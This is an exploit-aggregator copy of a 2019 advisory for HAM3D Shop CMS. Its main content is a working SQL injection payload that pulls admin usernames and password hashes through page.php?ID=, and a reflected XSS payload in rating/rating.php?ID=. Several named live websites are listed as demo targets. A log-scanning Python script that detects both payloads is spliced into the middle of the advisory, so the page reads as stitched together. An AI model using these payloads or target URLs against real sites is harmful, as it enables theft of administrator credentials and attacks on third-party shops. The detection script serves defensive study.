HAM3D Shop CMS Security Hole XSS & SQL Injection [Nullix TM]

CVE: (none listed)
Category: CWE-79
Price: $500
Severity: High
Author: NulliX TM
Risk: High
Exploitation Type: Remote
Date: 2019-02-20
CVSS: CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
EPSS: 0.02192
EPSS percentile (EPSSP): 0.50148


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019020210

Below is a copy:

HAM3D Shop CMS Security Hole XSS & SQL Injection [Nullix TM]
# Exploit Title: HAM3D Shop CMS Security Hole XSS & SQL Injection, parameters rating & Page
# Date: 2/13/2019
# Exploit Author: Nullix Security Team | NikbinHK | Mohammad Nikbin
# Vendor Homepage: HAm3D.net
# Version: Final Version
# Tested on: Windows, Linux
=================================================================================
[SQL injection]

[+] Method: SQL injection (Nullix Security Team of Iran)
[+] Admin login page: www.[path].com/admin/login.php
[+] Parameter: Page.php?ID=
=================
Hash type: MD5
=================
Exploit ==>
 page.php?ID=-1'+/*!50000union*/ select /*!50000unhex(hex(grOup_cOncat(username,0x3a,password)))*/+from+auser--+
=================================================================================
Demo:
[+] http://nanokala.ir/page.php?ID=[SQL]
[+] http://www.too30.ir/page.php?ID=[SQL]
=================================================================================

[XSS]

Method: XSS (Nullix Security Team of Iran)
HTTP method: GET
Directory: /rating/
Parameter: rating.php?ID=

Exploit: [ "><script>alert(/xss/)</script> ]

For example ====> www.[path]/nanokala.ir/rating/rating.php?ID="><script>alert(/xss/)</script>
======================================================================
[+] Demo: nanokala.ir/rating/rating.php?ID="><script>alert(/NikbinHKNullixSecurityTeam/)</script>
[+] Demo: jamkala.ir/rating/rating.php?ID="><script>alert(/NikbinHKNullixSecurityTeam/)</script>
[+] Demo: too30.ir/rating/rating.php?ID="><script>alert(/NikbinHKNullixSecurityTeam/)</script>
======================================================================
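Both payload shapes in this advisory (a MySQL version-comment UNION SELECT in page.php?ID= and a tag-breaking <script> in rating/rating.php?ID=) are easy to pick out of web server access logs, which is the quickest way for an operator to tell whether these endpoints were probed. The script below is an added example, not part of the advisory or the CMS: it parses combined-format access log lines, decodes the ID parameter on the two paths the advisory names, and labels the value as SQL injection or XSS. The log lines, path list and marker regexes are constructed assumptions, not real traffic or vendor code.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed combined-format access log lines (not real traffic).
SAMPLE_LOG = """
203.0.113.5 - - [20/Feb/2019:10:01:02 +0000] "GET /page.php?ID=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [20/Feb/2019:10:01:07 +0000] "GET /page.php?ID=-1'+/*!50000union*/+select+1--+ HTTP/1.1" 200 7310 "-" "curl/7.64"
203.0.113.9 - - [20/Feb/2019:10:01:11 +0000] "GET /rating/rating.php?ID=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E HTTP/1.1" 200 811 "-" "curl/7.64"
203.0.113.7 - - [20/Feb/2019:10:02:00 +0000] "GET /rating/rating.php?ID=17 HTTP/1.1" 200 790 "-" "Mozilla/5.0"
"""

# Request part of a combined-format line: ip ident user [ts] "METHOD target HTTP/x"
REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

# Endpoints the advisory names and the parameter each reads (assumed to take only a plain integer).
WATCHED = {"/page.php": "ID", "/rating/rating.php": "ID"}

# Payload markers. The MySQL version comment (/*!50000union*/) is matched
# explicitly because it hides "union" from a naive "union select" check.
SQLI_RE = re.compile(r"/\*!\d*\s*union|\bunion\b.*?\bselect\b|--\s|'\s*(or|and)\b", re.I)
XSS_RE = re.compile(r"<\s*/?script\b|javascript:|\bon\w+\s*=", re.I)

def classify_value(value):
    """Return 'sqli', 'xss' or None for one already URL-decoded ID value."""
    if value.lstrip("-").isdigit():
        return None
    if XSS_RE.search(value):
        return "xss"
    if SQLI_RE.search(value):
        return "sqli"
    return None

def scan_log(text):
    """Return (ip, path, kind) for every request whose watched parameter looks like a payload."""
    hits = []
    for line in text.strip().splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        param = WATCHED.get(parts.path.lower())
        if param is None:
            continue
        # parse_qs percent-decodes and turns '+' into spaces, as PHP's $_GET does.
        for value in parse_qs(parts.query, keep_blank_values=True).get(param, []):
            kind = classify_value(value)
            if kind:
                hits.append((m.group("ip"), parts.path, kind))
    return hits
```

Running scan_log(SAMPLE_LOG) flags the second and third constructed lines as sqli and xss respectively; feed it a real access log (or pipe one through it) to get the same triage over live data.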

[+] Thanks to ======> Nullix Team guys

Copyright ©2024 Exploitalert.